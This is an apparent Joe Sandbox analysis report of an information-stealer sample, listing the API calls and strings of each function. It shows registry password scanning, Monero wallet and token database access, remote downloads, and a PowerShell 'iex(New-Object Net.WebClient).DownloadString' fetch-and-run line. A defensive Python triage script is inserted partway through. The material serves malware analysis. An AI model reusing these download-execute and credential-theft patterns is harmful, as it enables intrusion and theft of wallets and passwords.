                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: d75723db22a15d0cd6f1bec928106391ee5a378b01ec068e0ec5b4269a3ff2f9
                              • Instruction ID: 1e4e33bedf52f485c5b20b49551eda36eb9292903f6c1939f618776f6425be75
                              • Opcode Fuzzy Hash: d75723db22a15d0cd6f1bec928106391ee5a378b01ec068e0ec5b4269a3ff2f9
                              • Instruction Fuzzy Hash: F95130F195011D5BCB19EB64DD96AFD73BCAB50300F4045E8B70E63092EE706B8DCAA6
                              APIs
                                • Part of subcall function 00BE72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00BE733A
                                • Part of subcall function 00BE72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00BE73B1
                                • Part of subcall function 00BE72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00BE740D
                                • Part of subcall function 00BE72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00BE7452
                                • Part of subcall function 00BE72D0: HeapFree.KERNEL32(00000000), ref: 00BE7459
                              • lstrcat.KERNEL32(00000000,00C017FC), ref: 00BE7606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00BE7648
                              • lstrcat.KERNEL32(00000000, : ), ref: 00BE765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00BE768F
                              • lstrcat.KERNEL32(00000000,00C01804), ref: 00BE76A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00BE76D3
                              • lstrcat.KERNEL32(00000000,00C01808), ref: 00BE76ED
                              • task.LIBCPMTD ref: 00BE76FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                              • String ID: :
                              • API String ID: 2677904052-3653984579
                              • Opcode ID: ab5d7ef0ab6c6f5c6fabff11322bacab5a3859a2aa74027c418c1500478717f9
                              • Instruction ID: 334011c46763211594bb1554de80464035a3c67b6a313ed78bb47a18de0dc282
                              • Opcode Fuzzy Hash: ab5d7ef0ab6c6f5c6fabff11322bacab5a3859a2aa74027c418c1500478717f9
                              • Instruction Fuzzy Hash: AE313EB5900149DFCB18EBA6DC9ADFE77B4BB48301B184168F106B7291DF34A94BCB52
                              APIs
                                • Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6
                                • Part of subcall function 00BE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BE4839
                                • Part of subcall function 00BE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BE4849
                              • InternetOpenA.WININET(00C00DF7,00000001,00000000,00000000,00000000), ref: 00BE610F
                              • StrCmpCA.SHLWAPI(?,009BF440), ref: 00BE6147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00BE618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00BE61B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 00BE61DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00BE620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00BE6249
                              • InternetCloseHandle.WININET(?), ref: 00BE6253
                              • InternetCloseHandle.WININET(00000000), ref: 00BE6260
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: 151d5e74e92f3b4c1d11f6423020ca421bb1f9bab9923b61e2bccfaf8b0da68d
                              • Instruction ID: 1511cbe1ff928f01292a04aa87ea47b10a77ee7574c20b042f731ecf04ff2236
                              • Opcode Fuzzy Hash: 151d5e74e92f3b4c1d11f6423020ca421bb1f9bab9923b61e2bccfaf8b0da68d
                              • Instruction Fuzzy Hash: D7516EB1900218AFDB24DF51DC45BEE77B8EB04741F1080E8A709B71C0DBB46A8ACF96
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00BE733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00BE73B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00BE740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00BE7452
                              • HeapFree.KERNEL32(00000000), ref: 00BE7459
                              • task.LIBCPMTD ref: 00BE7555
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuetask
                              • String ID: Password
                              • API String ID: 775622407-3434357891
                              • Opcode ID: 25e37e5d6d54ab71947d7c130c267d50e5d21583ed93a09431510bd3b8be4322
                              • Instruction ID: c641188625804b4899a5e6265f37b2b577805dfe71e485eb8de2daf2eedb542f
                              • Opcode Fuzzy Hash: 25e37e5d6d54ab71947d7c130c267d50e5d21583ed93a09431510bd3b8be4322
                              • Instruction Fuzzy Hash: 8A612AB58442A89BDB24DB51DC45BD9B7F8FF48300F0481E9E649A6281EF705BC9CFA1
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
                                • Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                                • Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6
                              • lstrlen.KERNEL32(00000000), ref: 00BEBC9F
                                • Part of subcall function 00BF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BF8E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 00BEBCCD
                              • lstrlen.KERNEL32(00000000), ref: 00BEBDA5
                              • lstrlen.KERNEL32(00000000), ref: 00BEBDB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: f5ebe2ff842e484543de78c3a54aadbb16dfba341a10ce0aef148d581a99219f
                              • Instruction ID: 03f83e694f5ee0d534e4b61b45f12d12dba7ebb171e7b0014c9d8533ffa4d132
                              • Opcode Fuzzy Hash: f5ebe2ff842e484543de78c3a54aadbb16dfba341a10ce0aef148d581a99219f
                              • Instruction Fuzzy Hash: 83B111B191010C9BDB18EBA4DD56EFE73B8AF54300F4445A8F60AB7091EF746A4DCB62
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: f6f69557cfc55a999802c8700e52c0b74cfb073db0dd06ad38b1ce4f37be9c04
                              • Instruction ID: 5b5291c18519f31b3525faa8a4f459ad41e7b1d9ec0fc2dc540a1e1a2b3b16f8
                              • Opcode Fuzzy Hash: f6f69557cfc55a999802c8700e52c0b74cfb073db0dd06ad38b1ce4f37be9c04
                              • Instruction Fuzzy Hash: 67F05430904209EFD354AFE1E90972CBB70FB14703F0801A9EA05D7290D6704F46DB9A
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00BE4FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BE4FD1
                              • InternetOpenA.WININET(00C00DDF,00000000,00000000,00000000,00000000), ref: 00BE4FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00BE5011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00BE5041
                              • InternetCloseHandle.WININET(?), ref: 00BE50B9
                              • InternetCloseHandle.WININET(?), ref: 00BE50C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 8b38bd6b15a9c7758caaad2e3daefdb3f945f8d946960f08ed794c121bf6050e
                              • Instruction ID: ef199f2d2ab2dc8301d761e276b3727fe5a84f1b2478219c8ada4fab431fd861
                              • Opcode Fuzzy Hash: 8b38bd6b15a9c7758caaad2e3daefdb3f945f8d946960f08ed794c121bf6050e
                              • Instruction Fuzzy Hash: A13106B4A00218ABDB24CF55DC85BDCB7B4EB48704F1081E9FB09B7281C7706A898F99
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,009BE8C8,00000000,?,00C00E2C,00000000,?,00000000), ref: 00BF8130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BF8137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00BF8158
                              • wsprintfA.USER32 ref: 00BF81AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2922868504-3474575989
                              • Opcode ID: e7d42812be2b302b1667c7bbf5bd9c3f2318088e095a6835fcac33652c5e339d
                              • Instruction ID: 289f39f8aeca7655e23f2932d85c032cc528c2455dffd837726e9432b0d9c872
                              • Opcode Fuzzy Hash: e7d42812be2b302b1667c7bbf5bd9c3f2318088e095a6835fcac33652c5e339d
                              • Instruction Fuzzy Hash: E72127B1A44208ABDB14DFD5CC49FAEB7B9EB48B00F104659F705BB280C77869098BA5
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00BF8426
                              • wsprintfA.USER32 ref: 00BF8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00BF847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 00BF848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00BF8499
                                • Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6
                              • RegQueryValueExA.ADVAPI32(00000000,009BE9D0,00000000,000F003F,?,00000400), ref: 00BF84EC
                              • lstrlen.KERNEL32(?), ref: 00BF8501
                              • RegQueryValueExA.ADVAPI32(00000000,009BEA18,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00C00B34), ref: 00BF8599
                              • RegCloseKey.ADVAPI32(00000000), ref: 00BF8608
                              • RegCloseKey.ADVAPI32(00000000), ref: 00BF861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: f4c53f8de5d7b796f68c427df4743adb3d42086176ea76565866c84316d61f94
                              • Instruction ID: 9b2d45cf22d9b22c8b5531dfbc19e8490c6e87093eb9cafb2ea7bbb80a57a9d5
                              • Opcode Fuzzy Hash: f4c53f8de5d7b796f68c427df4743adb3d42086176ea76565866c84316d61f94
                              • Instruction Fuzzy Hash: 6921D8B191021CAFDB28DB54DC85FE9B7B8FB48700F04C5E9A609A6140DF716A8ACF94
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BF76A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BF76AB
                              • RegOpenKeyExA.ADVAPI32(80000002,009ABAD0,00000000,00020119,00000000), ref: 00BF76DD
                              • RegQueryValueExA.ADVAPI32(00000000,009BE970,00000000,00000000,?,000000FF), ref: 00BF76FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 00BF7708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 4db9bac4d39641831728f246937adb6602ebe0a2cb451fb3601af82b89b66a9c
                              • Instruction ID: 74fa9e40de2811d572315f60b667d3fd8ad4cc6286992a8bf2bf9717c86c67c7
                              • Opcode Fuzzy Hash: 4db9bac4d39641831728f246937adb6602ebe0a2cb451fb3601af82b89b66a9c
                              • Instruction Fuzzy Hash: CC018FB4A40208BFEB24EBE5DC4DF7DB7B8EB08701F1040A4FB04E7290DA7099098B51
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BF7734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BF773B
                              • RegOpenKeyExA.ADVAPI32(80000002,009ABAD0,00000000,00020119,00BF76B9), ref: 00BF775B
                              • RegQueryValueExA.ADVAPI32(00BF76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00BF777A
                              • RegCloseKey.ADVAPI32(00BF76B9), ref: 00BF7784
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: a9b4693d9b36726d326eb99f6dc4a42ae7db47ce5ed326a88dcfd98cf3853b2c
                              • Instruction ID: 1f74895895f8bf65b8461b7b97c9ba353db69fe39d9f2f27f6ed155d12009c29
                              • Opcode Fuzzy Hash: a9b4693d9b36726d326eb99f6dc4a42ae7db47ce5ed326a88dcfd98cf3853b2c
                              • Instruction Fuzzy Hash: 140144B5A40308BFDB14DBE1DC4AFAEB7B8EB44700F1045A5FA05A7281DA7059058B51
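Added example, not code from the Joe Sandbox report or from the analysed sample: a small Python triage helper that parses the per-function API listings above (the "• API.MODULE(args), ref: ADDR" lines, including the "Part of subcall function" variant and calls printed without an argument list such as wsprintfA) and flags the stealer behaviours they expose: HKCU value enumeration followed by a StrStrA for "Password", access to \Monero\wallet.keys, the AccountId lookup, the InternetOpenUrlA/InternetReadFile download loop and the CurrentBuildNumber fingerprint. The sample text is copied from this report's entries; the rule names, the hive decoding table and the function labelling (address of the first non-subcall call) are assumptions made for this example.

```python
"""Triage helper for the per-function API listings in a Joe Sandbox report.

Added example, not code from the report or from the analysed sample. It
parses the "• API.MODULE(args), ref: ADDR" lines, groups them by function
(each listing starts with an "APIs" header) and flags the stealer
behaviours visible in this report. Rule names, the hive table and the
sample text below are assumptions / constructed input for this example.
"""
import re
from collections import namedtuple

# Constructed input: lines copied from the function entries of this report.
SAMPLE_REPORT = """\
APIs
• RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00BE733A
• RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00BE73B1
• StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00BE740D
APIs
  • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\\Monero\\wallet.keys,00C00E17), ref: 00BFA9C5
• StrStrA.SHLWAPI(00000000,AccountId), ref: 00BEBCCD
APIs
• GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00BE4FCA
• InternetOpenA.WININET(00C00DDF,00000000,00000000,00000000,00000000), ref: 00BE4FEA
• InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00BE5011
• InternetReadFile.WININET(?,?,00000400,00000000), ref: 00BE5041
APIs
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BF7734
• RegOpenKeyExA.ADVAPI32(80000002,009ABAD0,00000000,00020119,00BF76B9), ref: 00BF775B
• RegQueryValueExA.ADVAPI32(00BF76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00BF777A
APIs
• GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00BF8158
• wsprintfA.USER32 ref: 00BF81AC
"""

Call = namedtuple("Call", "api module args ref subcall")

# One report line: optional "Part of subcall function ADDR:" prefix, then
# API.MODULE, an optional "(args)" list, an optional comma, and "ref: ADDR".
_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Predefined registry root handles as they appear in RegOpenKeyExA's first arg.
HIVES = {"80000000": "HKEY_CLASSES_ROOT", "80000001": "HKEY_CURRENT_USER",
         "80000002": "HKEY_LOCAL_MACHINE", "80000003": "HKEY_USERS"}


def parse_call(line):
    """Return a Call for one API line, or None if the line is not one."""
    m = _LINE.match(line)
    if not m:
        return None
    args = m.group("args")
    return Call(m.group("api"), m.group("mod"),
                tuple(a.strip() for a in args.split(",")) if args else (),
                m.group("ref").upper(), m.group("sub"))


def parse_functions(text):
    """Split the report text into one list of Calls per "APIs" listing."""
    functions, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            functions.append(current)
            continue
        call = parse_call(line)
        if call is not None and current is not None:
            current.append(call)
    return [f for f in functions if f]


def _has(calls, api):
    return any(c.api == api for c in calls)


def _arg_contains(calls, needle):
    return any(needle.lower() in a.lower() for c in calls for a in c.args)


# Behaviour rules (assumed names) over the calls of a single function.
RULES = [
    ("registry_password_scan",
     lambda f: _has(f, "RegEnumValueA") and _arg_contains(f, "Password")),
    ("crypto_wallet_file", lambda f: _arg_contains(f, "wallet.keys")),
    ("token_db_query", lambda f: _arg_contains(f, "AccountId")),
    ("wininet_download",
     lambda f: _has(f, "InternetOpenUrlA") and _has(f, "InternetReadFile")),
    ("os_fingerprint", lambda f: _arg_contains(f, "CurrentBuildNumber")),
]


def label_of(calls):
    """Label a function by the address of its first call that is not a subcall."""
    for c in calls:
        if c.subcall is None:
            return c.ref
    return calls[0].ref


def registry_roots(calls):
    """Decode the root handle of every RegOpenKeyExA call in the function."""
    return [HIVES.get(c.args[0], c.args[0])
            for c in calls if c.api == "RegOpenKeyExA" and c.args]


def triage(text):
    """Map each function label to the list of rule names it triggers."""
    result = {}
    for calls in parse_functions(text):
        hits = [name for name, pred in RULES if pred(calls)]
        if hits:
            result[label_of(calls)] = hits
    return result


if __name__ == "__main__":
    for label, hits in triage(SAMPLE_REPORT).items():
        print(label, ", ".join(hits))
```

Functions that trigger no rule (here the GlobalMemoryStatusEx/wsprintfA one) are dropped from the result, which keeps the output to the entries worth a reverser's attention; extend RULES with further predicates rather than editing triage().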
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BE99EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BE9A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00BE9A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,00BE148F,00000000), ref: 00BE9A5A
                              • LocalFree.KERNEL32(00BE148F), ref: 00BE9A90
                              • CloseHandle.KERNEL32(000000FF), ref: 00BE9A9A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: a74f6ac488aa13bf0ad58e650c276f2cf6981d73a6035603d6f1a971ec7dd5a6
                              • Instruction ID: 2a5ab0388dfd71f779a1c89df2af092bf8f8b4f655ad7efdc711948e2bee95b5
                              • Opcode Fuzzy Hash: a74f6ac488aa13bf0ad58e650c276f2cf6981d73a6035603d6f1a971ec7dd5a6
                              • Instruction Fuzzy Hash: B7312DB4A00209EFDB24CF96D985FAE77F5FF48340F1081A8E915A7290D774A949CFA1
                              APIs
                              • lstrcat.KERNEL32(?,009BEE20), ref: 00BF47DB
                                • Part of subcall function 00BF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BF8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00BF4801
                              • lstrcat.KERNEL32(?,?), ref: 00BF4820
                              • lstrcat.KERNEL32(?,?), ref: 00BF4834
                              • lstrcat.KERNEL32(?,009AA910), ref: 00BF4847
                              • lstrcat.KERNEL32(?,?), ref: 00BF485B
                              • lstrcat.KERNEL32(?,009BDF60), ref: 00BF486F
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BF8D90: GetFileAttributesA.KERNEL32(00000000,?,00BE1B54,?,?,00C0564C,?,?,00C00E1F), ref: 00BF8D9F
                                • Part of subcall function 00BF4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00BF4580
                                • Part of subcall function 00BF4570: RtlAllocateHeap.NTDLL(00000000), ref: 00BF4587
                                • Part of subcall function 00BF4570: wsprintfA.USER32 ref: 00BF45A6
                                • Part of subcall function 00BF4570: FindFirstFileA.KERNEL32(?,?), ref: 00BF45BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: 003229a62005a8fbb71324198c62cff75f10eaabe3d970c4f3692e215ff0614f
                              • Instruction ID: 5f31e5fe3ff319dcf29f43cc8fbde084999e2c1aec60d291021c90734125cd16
                              • Opcode Fuzzy Hash: 003229a62005a8fbb71324198c62cff75f10eaabe3d970c4f3692e215ff0614f
                              • Instruction Fuzzy Hash: 0B3155B690020C5BCB24F7A0DC86EFD73BCAB58700F4445D9B319A7091DEB4D68D8B95
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
                                • Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00BF2D85
                              Strings
                              • ')", xrefs: 00BF2CB3
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00BF2D04
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00BF2CC4
                              • <, xrefs: 00BF2D39
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: 67a75e99c9ab22d3a9f5a956eb9649ae7c823dd132819a9d604afd2de9f7e23a
                              • Instruction ID: c4e169f30445f9e99c0583fd80dcc088f4d655b5b805e5e376cfe19bde110856
                              • Opcode Fuzzy Hash: 67a75e99c9ab22d3a9f5a956eb9649ae7c823dd132819a9d604afd2de9f7e23a
                              • Instruction Fuzzy Hash: 2441B2B1C1010C9ADB18FBA4C891BFDB7B4AF14340F5081A9E61AB7195DFB46A4ECF91
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00BE9F41
